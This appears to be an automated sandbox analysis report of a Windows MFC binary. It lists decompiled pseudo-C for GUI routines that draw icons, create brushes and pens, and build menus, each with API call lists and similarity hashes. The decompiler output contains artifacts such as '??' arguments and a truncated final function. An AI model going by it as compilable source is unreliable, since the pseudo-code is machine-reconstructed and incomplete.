Part of subcall function 004010A0: _EH_prolog.MSVCRT ref: 004142B4
Part of subcall function 004010A0: ImageList_GetIcon.COMCTL32(?,?,00000000), ref: 004142CB
Part of subcall function 004010A0: #323.MFC42 ref: 004142D6
Part of subcall function 004010A0: CreateCompatibleDC.GDI32(?), ref: 004142ED
Part of subcall function 004010A0: #1640.MFC42(00000000), ref: 004142F7
Part of subcall function 004010A0: CreateCompatibleBitmap.GDI32(?,00000010,0000000F), ref: 0041430C
Part of subcall function 004010A0: #1641.MFC42(00000000), ref: 00414318
Part of subcall function 004010A0: #5785.MFC42(?,?,00000000), ref: 0041432C
Part of subcall function 004010A0: GetSysColor.USER32(0000000F), ref: 00414343
Part of subcall function 004010A0: CreateSolidBrush.GDI32(00000000), ref: 0041434A
Part of subcall function 004010A0: #1641.MFC42(00000000), ref: 00414354
Part of subcall function 004010A0: DrawIconEx.USER32 ref: 00414381
Part of subcall function 004010A0: #5785.MFC42(?,00000000), ref: 00414392
Part of subcall function 004010A0: #2405.MFC42(?,00000000), ref: 0041439A
Part of subcall function 004010A0: DestroyIcon.USER32(00000000,?,00000000), ref: 004143A0
Part of subcall function 004010A0: #2414.MFC42 ref: 004143B4
Part of subcall function 004010A0: #640.MFC42 ref: 004143C7

GetSysColor.USER32(0000000F), ref: 00417546
ImageList_AddMasked.COMCTL32(00000004,?,00000000), ref: 00417557
ReleaseDC.USER32 ref: 00417565
#2414.MFC42 ref: 0041757A
#2414.MFC42 ref: 00417591
#2414.MFC42 ref: 004175A6

Strings

LB, xrefs: 0041734C
LB, xrefs: 00417495
LB, xrefs: 00417527, 0041752A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ImageList_$#2414ColorIconMasked$#1641Create$#5785CompatibleH_prolog$#1640#2405#2452#2859#2864#323#640BitmapBrushDeleteDesktopDestroyDrawObjectReleaseReplaceSolidWindow
String ID: LB$LB$LB
API String ID: 2600138966-4268681488
Opcode ID: 67f17533da43afd22053e08bf6c49b81e5448f4de1d6f2e846256b55ef1b71db
Instruction ID: 0af4a32cfe689e4cc7093bccbadc56166731d38a7fedd67902ec76a284e1d529
Opcode Fuzzy Hash: 67f17533da43afd22053e08bf6c49b81e5448f4de1d6f2e846256b55ef1b71db
Instruction Fuzzy Hash: 3191387190011AABDF04DFE5D945BEEBBB4FF08304F10812AE915B71A1DB78AA45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041692E, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 152
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041692E(struct HDC__* _a4, int _a8, int _a12, int _a16, int _a20, void* _a24, int _a28, int _a32, int _a36) {
				struct HDC__* _v8;
				struct HDC__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct tagRECT _v40;
				signed char _v41;
				signed char _v42;
				signed char _v43;
				signed char _v44;
				signed char _v45;
				signed char _v46;
				signed char _v47;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				short _v74;
				short _v76;
				int _v80;
				int _v84;
				struct tagBITMAPINFO _v88;
				struct HDC__* _t77;
				void* _t83;
				long _t88;
				int _t113;
				int _t117;
				struct HDC__* _t122;

				_t77 = CreateCompatibleDC(_a4);
				_v12 = _t77;
				if(_t77 != 0) {
					_t122 = CreateCompatibleDC(_t77);
					_v8 = _t122;
					if(_t122 != 0) {
						_t113 = _a16;
						_v80 = _a20;
						_v88.bmiColors = _v88.bmiColors & 0x00000000;
						_v47 = _v47 & 0x00000000;
						_v46 = _v46 & 0x00000000;
						_v45 = _v45 & 0x00000000;
						_v44 = _v44 | 0x000000ff;
						_v43 = _v43 | 0x000000ff;
						_v42 = _v42 | 0x000000ff;
						_v41 = _v41 & 0x00000000;
						_v88.bmiHeader = 0x28;
						_v84 = _t113;
						_v76 = 1;
						_v74 = 1;
						_v72 = 0;
						_v68 = 0;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_t83 = CreateDIBSection(_t122,  &_v88, 0,  &_v24, 0, 0);
						if(_t83 != 0) {
							_v16 = SelectObject(_t122, _t83);
							_v20 = SelectObject(_v12, _a24);
							BitBlt(_v8, 0, 0, _t113, _a20, _v12, _a28, _a32, 0xcc0020);
							_t88 = _a8;
							_t117 = _a12;
							_v40.left = _t88;
							_v40.top = _t117;
							_v40.right = _t88 + _t113;
							_v40.bottom = _t117 + _a20;
							FillRect(_a4,  &_v40, GetSysColorBrush(_a36));
							_a24 = SelectObject(_a4, CreateSolidBrush(GetSysColor(0x14)));
							BitBlt(_a4, _a8 + 1, _a12 + 1, _a16, _a20, _v8, 0, 0, 0xb8074a);
							DeleteObject(SelectObject(_a4, CreateSolidBrush(GetSysColor(0x10))));
							BitBlt(_a4, _a8, _a12, _a16, _a20, _v8, 0, 0, 0xb8074a);
							DeleteObject(SelectObject(_a4, _a24));
							DeleteObject(SelectObject(_v8, _v16));
							SelectObject(_v12, _v20);
						}
						DeleteDC(_v8);
					}
					return DeleteDC(_v12);
				}
				return _t77;
			}

0x0041693f
0x00416943
0x00416948
0x00416951
0x00416955
0x00416958
0x00416962
0x00416965
0x00416968
0x0041696c
0x00416970
0x00416974
0x00416978
0x0041697c
0x00416980
0x00416984
0x00416994
0x0041699b
0x0041699e
0x004169a4
0x004169aa
0x004169ad
0x004169b0
0x004169b3
0x004169b6
0x004169b9
0x004169bc
0x004169c4
0x004169d7
0x004169e4
0x004169ff
0x00416a01
0x00416a04
0x00416a0a
0x00416a0f
0x00416a12
0x00416a1a
0x00416a2b
0x00416a51
0x00416a6a
0x00416a84
0x00416aa1
0x00416aac
0x00416ab7
0x00416abf
0x00416abf
0x00416ac4
0x00416aca
0x00000000
0x00416ace
0x00416ad7

APIs

CreateCompatibleDC.GDI32(?), ref: 0041693F
CreateCompatibleDC.GDI32(00000000), ref: 0041694F
CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004169BC
SelectObject.GDI32(00000000,00000000), ref: 004169D2
SelectObject.GDI32(?,?), ref: 004169DD
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004169FF
GetSysColorBrush.USER32(000000FF), ref: 00416A1D
FillRect.USER32 ref: 00416A2B
GetSysColor.USER32(00000014), ref: 00416A39
CreateSolidBrush.GDI32(00000000), ref: 00416A3C
SelectObject.GDI32(?,00000000), ref: 00416A46
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00B8074A), ref: 00416A6A
GetSysColor.USER32(00000010), ref: 00416A6E
CreateSolidBrush.GDI32(00000000), ref: 00416A71
SelectObject.GDI32(?,00000000), ref: 00416A7B
DeleteObject.GDI32(00000000), ref: 00416A84
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00B8074A), ref: 00416AA1
SelectObject.GDI32(?,?), ref: 00416AA9
DeleteObject.GDI32(00000000), ref: 00416AAC
SelectObject.GDI32(?,?), ref: 00416AB4
DeleteObject.GDI32(00000000), ref: 00416AB7
SelectObject.GDI32(?,?), ref: 00416ABF
DeleteDC.GDI32(?), ref: 00416AC4
DeleteDC.GDI32(?), ref: 00416ACE

Strings

(, xrefs: 00416994

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$CreateDelete$BrushColor$CompatibleSolid$FillRectSection
String ID: (
API String ID: 1953626954-3887548279
Opcode ID: 30e5ee8c889c858aadfc1898c3ca58a7c8c54ffae8fff83a1345b1b64a1fef70
Instruction ID: 716723c4c65179e73c8c7c1526a8b1f7c873da7a1bd21273d3469486ac18d9fe
Opcode Fuzzy Hash: 30e5ee8c889c858aadfc1898c3ca58a7c8c54ffae8fff83a1345b1b64a1fef70
Instruction Fuzzy Hash: 7551017180025CBFDF119FA5DC48AEEBFB9EF89350F14412AF910A2160C77699A1DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421672, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00421672(intOrPtr* __ecx, char _a8) {
				char _v0;
				intOrPtr* _v4;
				char _v5;
				intOrPtr _v120;
				intOrPtr* _t94;
				intOrPtr* _t96;
				char* _t97;
				intOrPtr* _t101;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t101 = __ecx;
				_v4 = __ecx;
				L004260F6();
				_a8 = 0;
				L00401974(__ecx + 0x40);
				_v0 = 0x42e55c;
				_t94 = __ecx + 0x48;
				_a8 = 1;
				L00401974(_t94);
				 *_t94 = 0x42e55c;
				_a8 = 2;
				L00401974(__ecx + 0x50);
				 *((intOrPtr*)(__ecx + 0x50)) = 0x42e544;
				_a8 = 3;
				L00401974(__ecx + 0x58);
				 *((intOrPtr*)(__ecx + 0x58)) = 0x42e544;
				_a8 = 4;
				L00401974(__ecx + 0x60);
				 *((intOrPtr*)(__ecx + 0x60)) = 0x42e544;
				_a8 = 5;
				L00401974(__ecx + 0x68);
				 *((intOrPtr*)(__ecx + 0x68)) = 0x42e544;
				_a8 = 6;
				L00401974(__ecx + 0x70);
				 *((intOrPtr*)(__ecx + 0x70)) = 0x42e544;
				_a8 = 7;
				L00401974(__ecx + 0x78);
				 *((intOrPtr*)(__ecx + 0x78)) = 0x42e544;
				_t96 = __ecx + 0x80;
				_a8 = 8;
				L00401974(_t96);
				 *_t96 = 0x42dce0;
				_t97 = __ecx + 0x90;
				_a8 = 9;
				 *_t97 = _v5;
				 *((intOrPtr*)(_t97 + 4)) = L00401ED8(0, 0);
				 *((intOrPtr*)(_t97 + 8)) = 0;
				_v0 = 0xa;
				 *_t101 = 0x42f394;
				 *((intOrPtr*)(_t101 + 0x88)) = 0;
				 *((intOrPtr*)(_t101 + 0x8c)) = 0;
				 *(_t101 + 0x9c) = 1;
				_push(CreateSolidBrush(0));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_push(CreatePen(0, 1, 0));
				L004264BC();
				_push(CreatePen(0, 1, GetSysColor(0xf)));
				L004264BC();
				_push(CreatePen(0, 1, GetSysColor(0x14)));
				L004264BC();
				_push(CreatePen(0, 2, GetSysColor(0x14)));
				L004264BC();
				_push(CreatePen(0, 1, GetSysColor(0x10)));
				L004264BC();
				_push(CreatePen(0, 2, GetSysColor(0x10)));
				L004264BC();
				 *[fs:0x0] = _v120;
				return _t101;
			}

0x00421677
0x0042167c
0x0042167d
0x00421681
0x00421684
0x00421688
0x00421694
0x00421698
0x0042169d
0x004216a4
0x004216a7
0x004216ae
0x004216b3
0x004216bc
0x004216c1
0x004216cb
0x004216d1
0x004216d6
0x004216db
0x004216e1
0x004216e6
0x004216eb
0x004216f1
0x004216f6
0x004216fb
0x00421701
0x00421706
0x0042170b
0x00421711
0x00421716
0x0042171b
0x0042171e
0x00421724
0x0042172b
0x00421730
0x0042173a
0x00421744
0x00421749
0x00421750
0x00421753
0x00421757
0x0042175c
0x00421762
0x00421768
0x0042176e
0x0042177e
0x00421781
0x00421797
0x0042179b
0x004217ac
0x004217b0
0x004217bf
0x004217c3
0x004217d2
0x004217d6
0x004217e5
0x004217e9
0x004217f8
0x004217fc
0x0042180b
0x0042180f
0x0042181e
0x00421826

APIs

_EH_prolog.MSVCRT ref: 00421677
#567.MFC42 ref: 00421688
CreateSolidBrush.GDI32 ref: 00421778
#1641.MFC42(00000000), ref: 00421781
GetSysColor.USER32(0000000F), ref: 0042178E
CreateSolidBrush.GDI32(00000000), ref: 00421791
#1641.MFC42(00000000), ref: 0042179B
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217AA
#1641.MFC42(00000000), ref: 004217B0
GetSysColor.USER32(0000000F), ref: 004217B7
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217BD
#1641.MFC42(00000000), ref: 004217C3
GetSysColor.USER32(00000014), ref: 004217CA
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217D0
#1641.MFC42(00000000), ref: 004217D6
GetSysColor.USER32(00000014), ref: 004217DD
CreatePen.GDI32(00000000,00000002,00000000), ref: 004217E3
#1641.MFC42(00000000), ref: 004217E9
GetSysColor.USER32(00000010), ref: 004217F0
CreatePen.GDI32(00000000,00000001,00000000), ref: 004217F6
#1641.MFC42(00000000), ref: 004217FC
GetSysColor.USER32(00000010), ref: 00421803
CreatePen.GDI32(00000000,00000002,00000000), ref: 00421809
#1641.MFC42(00000000), ref: 0042180F

Strings

DB, xrefs: 004216C6

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641Create$Color$BrushSolid$#567H_prolog
String ID: DB
API String ID: 3263936817-3807777182
Opcode ID: 21ec17adb9471a19fe1029f77abc448ed9d4f8103b3afa69715bf22493127f45
Instruction ID: 91a8f59daaee8f57e2583ff205db0dc78c61f86808e6120e875122475f7e5164
Opcode Fuzzy Hash: 21ec17adb9471a19fe1029f77abc448ed9d4f8103b3afa69715bf22493127f45
Instruction Fuzzy Hash: 9D5194B05007849FD310EB36DC45BABBBD8BF85308F410A1EF5C657292DBB8A544CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00401DD9, Relevance: 43.8, APIs: 29, Instructions: 255
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401DD9(intOrPtr* __ecx) {
				struct HRSRC__* _t129;
				intOrPtr _t131;
				struct HMENU__* _t134;
				signed short _t137;
				signed char _t138;
				wchar_t* _t140;
				CHAR* _t142;
				struct HMENU__* _t154;
				intOrPtr _t156;
				struct HMENU__* _t160;
				struct HINSTANCE__* _t176;
				intOrPtr* _t178;
				wchar_t* _t180;
				void* _t215;
				signed short _t217;
				void* _t219;
				signed int _t220;
				int _t221;
				intOrPtr _t222;
				intOrPtr* _t224;
				void* _t226;
				void* _t228;
				void* _t229;

				L004269E6();
				_t229 = _t228 - 0x38;
				_push(4);
				_push( *(_t226 + 8));
				_t224 = __ecx;
				L00425FFA();
				_t176 = E004291AD;
				_t129 = FindResourceA(E004291AD,  *(_t226 + 8), 4);
				if(_t129 != 0) {
					L3:
					_t215 = LoadResource(_t176, _t129);
					if(_t215 == 0) {
						goto L5;
					} else {
						 *((intOrPtr*)( *_t224 + 0x24))();
						_t134 = CreateMenu();
						_push(_t134);
						L004266DE();
						if(_t134 != 0) {
							_t178 = ( *(LockResource(_t215) + 2) & 0x0000ffff) + _t135 + 4;
							L0042650A();
							 *((intOrPtr*)(_t226 - 0x30)) = 0x42e6f0;
							_t217 = 0;
							 *((intOrPtr*)(_t226 - 0x44)) = 0x42e6d8;
							 *(_t226 - 4) = 0;
							 *(_t226 - 0x40) = 0;
							 *((intOrPtr*)(_t226 - 0x34)) = 0;
							 *((intOrPtr*)(_t226 - 0x38)) = 0;
							 *((intOrPtr*)(_t226 - 0x3c)) = 0;
							_push(_t224);
							_push( *(_t226 - 0x28));
							 *(_t226 - 4) = 1;
							L00426582();
							E004018E8(_t226 - 0x44,  *((intOrPtr*)(_t226 - 0x3c)), 0);
							while(1) {
								_t137 =  *_t178;
								 *(_t226 + 8) = _t137;
								 *(_t226 + 8) =  *(_t226 + 8) & 0x00000010;
								_t180 = _t178 + 2;
								 *(_t226 - 0x1c) = _t137;
								if( *(_t226 + 8) != _t217) {
									 *(_t226 - 0x18) = _t217;
								} else {
									 *(_t226 - 0x18) =  *_t180;
									_t180 =  &(_t180[0]);
								}
								_t138 = _t137 & 0x0000ffff;
								 *(_t226 - 0x10) = _t138;
								if((_t138 & 0x00000080) != 0) {
									 *(_t226 - 0x10) =  *(_t226 - 0x10) - 0x80;
								}
								_t140 = wcslen(_t180) + _t139 + 2;
								_push(_t140);
								L00425E38();
								 *(_t226 - 0x14) = _t140;
								wcscpy(_t140, _t180);
								_t142 = wcslen(_t180);
								_t219 = 0;
								_t229 = _t229 + 0x14;
								_t178 = _t180 + 2 + _t142 * 2;
								if( *(_t226 + 8) == 0) {
									goto L19;
								}
								if(( *(_t226 - 0x1c) & 0x00000080) != 0) {
									_t142 =  *(_t226 - 0x40);
									_t142[ *(_t226 - 0x28) * 4 - 4] = 1;
								}
								_push(0x54);
								L00425E38();
								 *(_t226 + 8) = _t142;
								 *(_t226 - 4) = 2;
								if(_t142 != _t219) {
									_t219 = L004020E5(_t142);
								}
								 *(_t226 - 4) = 1;
								 *((intOrPtr*)(_t219 + 0x48)) =  *((intOrPtr*)(_t224 + 0x48));
								 *((intOrPtr*)(_t219 + 0x44)) =  *((intOrPtr*)(_t224 + 0x44));
								 *((intOrPtr*)(_t219 + 0x3c)) =  *((intOrPtr*)(_t224 + 0x3c));
								 *(_t219 + 0x40) = 1;
								_push(CreatePopupMenu());
								L004266DE();
								_push(0xffffffff);
								_push( *((intOrPtr*)(_t219 + 4)));
								_push( *(_t226 - 0x10));
								_push( *(_t226 - 0x14));
								L00402022( *((intOrPtr*)( *((intOrPtr*)(_t226 - 0x2c)) +  *(_t226 - 0x28) * 4 - 4)));
								_push(_t219);
								_push( *(_t226 - 0x28));
								L00426582();
								L004020D6(_t226 - 0x44, 0);
								L24:
								_push( *(_t226 - 0x14));
								L00425DF0();
								if( *(_t226 - 0x28) - 1 != 0xffffffff) {
									_t217 = 0;
									continue;
								}
								_t221 = 0;
								if(GetMenuItemCount( *(_t224 + 4)) > 0) {
									do {
										_push(_t226 + 8);
										L0040154B( *((intOrPtr*)( *((intOrPtr*)(_t224 + 0xc)) + _t221 * 4)));
										 *(_t226 - 4) = 3;
										_t154 = GetSubMenu( *(_t224 + 4), _t221);
										_push(_t154);
										L0042635A();
										_t156 =  *((intOrPtr*)( *((intOrPtr*)(_t224 + 0xc)) + _t221 * 4));
										if(_t154 == 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = 0x400;
											_push( *(_t226 + 8));
											_push( *((intOrPtr*)(_t156 + 0x14)));
											_push(0x400);
										} else {
											 *((intOrPtr*)(_t156 + 0x10)) = 0x410;
											_t160 = GetSubMenu( *(_t224 + 4), _t221);
											_push(_t160);
											L0042635A();
											_push( *(_t226 + 8));
											_push( *((intOrPtr*)(_t160 + 4)));
											_push(0x410);
										}
										ModifyMenuA( *(_t224 + 4), _t221, ??, ??, ??);
										 *(_t226 - 4) = 1;
										L00425DFC();
										_t221 = _t221 + 1;
									} while (_t221 < GetMenuItemCount( *(_t224 + 4)));
								}
								 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
								_t222 = 1;
								 *((intOrPtr*)(_t224 + 0x50)) = _t222;
								E00401717(_t226 - 0x44);
								 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
								L00426504();
								_t131 = _t222;
								goto L32;
								L19:
								_push(0xffffffff);
								_push( *(_t226 - 0x18) & 0x0000ffff);
								_push( *(_t226 - 0x10));
								_push( *(_t226 - 0x14));
								L00402022( *((intOrPtr*)( *((intOrPtr*)(_t226 - 0x2c)) +  *(_t226 - 0x28) * 4 - 4)));
								if(( *(_t226 - 0x1c) & 0x00000080) != 0) {
									( *(_t226 - 0x40))[ *(_t226 - 0x28) * 4 - 4] = 1;
								}
								_t220 =  *(_t226 - 0x28) - 1;
								if(_t220 >= 0) {
									while( *((intOrPtr*)( *(_t226 - 0x40) + _t220 * 4)) != 0) {
										E004019F1( *((intOrPtr*)( *((intOrPtr*)(_t226 - 0x2c)) +  *(_t226 - 0x28) * 4 - 4)));
										_push(1);
										_push(_t220);
										L0042660C();
										L00401F64(_t226 - 0x44, _t220, 1);
										_t220 = _t220 - 1;
										if(_t220 >= 0) {
											continue;
										}
										goto L24;
									}
								}
								goto L24;
							}
						} else {
							goto L5;
						}
					}
				} else {
					_t176 = 0;
					_t129 = FindResourceA(0,  *(_t226 + 8), 4);
					if(_t129 == 0) {
						L5:
						_t131 = 0;
					} else {
						goto L3;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
				return _t131;
			}

0x00415921
0x00415926
0x0041592c
0x0041592e
0x00415931
0x00415933
0x00415943
0x00415946
0x0041594a
0x0041595a
0x00415962
0x00415966
0x00000000
0x00415968
0x0041596c
0x0041596f
0x00415975
0x00415978
0x0041597f
0x00415993
0x0041599a
0x0041599f
0x004159a6
0x004159a8
0x004159af
0x004159b2
0x004159b5
0x004159b8
0x004159bb
0x004159be
0x004159c2
0x004159c5
0x004159c9
0x004159d5
0x004159de
0x004159de
0x004159e2
0x004159e5
0x004159e9
0x004159ee
0x004159f1
0x004159fe
0x004159f3
0x004159f7
0x004159fb
0x004159fb
0x00415a01
0x00415a06
0x00415a09
0x00415a0b
0x00415a0b
0x00415a1b
0x00415a1f
0x00415a20
0x00415a27
0x00415a2a
0x00415a31
0x00415a33
0x00415a35
0x00415a3c
0x00415a40
0x00000000
0x00000000
0x00415a4a
0x00415a4c
0x00415a52
0x00415a52
0x00415a5a
0x00415a5c
0x00415a62
0x00415a67
0x00415a6b
0x00415a74
0x00415a74
0x00415a79
0x00415a7d
0x00415a83
0x00415a89
0x00415a8c
0x00415a99
0x00415a9c
0x00415aa7
0x00415aa9
0x00415ab0
0x00415ab3
0x00415ab6
0x00415abb
0x00415abf
0x00415ac2
0x00415acc
0x00415b3e
0x00415b3e
0x00415b41
0x00415b4e
0x004159dc
0x00000000
0x004159dc
0x00415b57
0x00415b61
0x00415b6d
0x00415b70
0x00415b77
0x00415b7d
0x00415b84
0x00415b8a
0x00415b8b
0x00415b95
0x00415b98
0x00415bc4
0x00415bc7
0x00415bcd
0x00415bce
0x00415b9a
0x00415b9b
0x00415ba5
0x00415bab
0x00415bac
0x00415bb1
0x00415bb7
0x00415bb8
0x00415bb8
0x00415bd3
0x00415bd8
0x00415bdc
0x00415be4
0x00415beb
0x00415b6d
0x00415bf3
0x00415bf9
0x00415bfd
0x00415c00
0x00415c05
0x00415c0c
0x00415c11
0x00000000
0x00415ad3
0x00415ada
0x00415adc
0x00415ae0
0x00415ae7
0x00415aea
0x00415af3
0x00415afb
0x00415afb
0x00415b06
0x00415b0b
0x00415b0d
0x00415b20
0x00415b25
0x00415b27
0x00415b2b
0x00415b36
0x00415b3b
0x00415b3c
0x00000000
0x00000000
0x00000000
0x00415b3c
0x00415b0d
0x00000000
0x00415b0b
0x00000000
0x00000000
0x00000000
0x0041597f
0x0041594c
0x0041594e
0x00415954
0x00415958
0x00415981
0x00415981
0x00000000
0x00000000
0x00000000
0x00415958
0x00415c13
0x00415c19
0x00415c21

APIs

_EH_prolog.MSVCRT ref: 00415921
#1146.MFC42(?,00000004), ref: 00415933
FindResourceA.KERNEL32(00000000,?,00000004), ref: 00415946
FindResourceA.KERNEL32(00000000,?,00000004), ref: 00415954
LoadResource.KERNEL32(00000000,00000000), ref: 0041595C
CreateMenu.USER32 ref: 0041596F
#1644.MFC42(00000000), ref: 00415978
LockResource.KERNEL32(00000000,00000000), ref: 00415989
#500.MFC42 ref: 0041599A
#5860.MFC42(?), ref: 004159C9
wcslen.MSVCRT ref: 00415A19
#823.MFC42(?), ref: 00415A20
wcscpy.MSVCRT ref: 00415A2A
wcslen.MSVCRT ref: 00415A31
#823.MFC42(00000054), ref: 00415A5C
CreatePopupMenu.USER32 ref: 00415A93
#1644.MFC42(00000000), ref: 00415A9C
#5860.MFC42(?,00000000,?,00000080,?,000000FF,00000000), ref: 00415AC2
#5606.MFC42(?,00000001,?,?,?,000000FF), ref: 00415B2B
#825.MFC42(?,?,?,?,000000FF), ref: 00415B41
GetMenuItemCount.USER32 ref: 00415B59
GetSubMenu.USER32 ref: 00415B84
#2863.MFC42(00000000), ref: 00415B8B
GetSubMenu.USER32 ref: 00415BA5
#2863.MFC42(00000000), ref: 00415BAC
ModifyMenuA.USER32(00000003,00000000,00000400,?,00000010), ref: 00415BD3
#800.MFC42 ref: 00415BDC
GetMenuItemCount.USER32 ref: 00415BE5
#772.MFC42 ref: 00415C0C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Resource$#1644#2863#5860#823CountCreateFindItemwcslen$#1146#500#5606#772#800#825H_prologLoadLockModifyPopupwcscpy
String ID:
API String ID: 4079928793-0
Opcode ID: 5bff3b98dd06ebd144fc72072064c96ddbd01b1696cef0364e38d1bc5e8acba7
Instruction ID: 8d5eb1ffa6afb94b824e144433469d20ba863bb14054308a1e5deb5522acc47e
Opcode Fuzzy Hash: 5bff3b98dd06ebd144fc72072064c96ddbd01b1696cef0364e38d1bc5e8acba7
Instruction Fuzzy Hash: 4DA1D571900618EFCB10EFA9D985EEEBBB5FF88314F10411EF515A72A1CB78A981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00421FF0, Relevance: 42.2, APIs: 28, Instructions: 244
windowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00421FF0(intOrPtr __ecx, void* __eflags) {
				struct tagSIZE _t108;
				struct HICON__* _t154;
				signed int _t155;
				void* _t156;
				signed int _t173;
				intOrPtr _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				struct tagSIZE _t182;
				struct tagSIZE* _t214;
				signed int _t216;
				intOrPtr _t217;
				void* _t222;
				intOrPtr _t223;
				void* _t227;

				L004269E6();
				_t175 = __ecx;
				_push(_t227 - 0x14);
				 *((intOrPtr*)(_t227 - 0x10)) = __ecx;
				L004014F6( *((intOrPtr*)(_t227 + 0x14)));
				_t216 =  *(_t227 + 8);
				 *(_t227 - 4) =  *(_t227 - 4) & 0x00000000;
				_t214 = _t227 - 0x24;
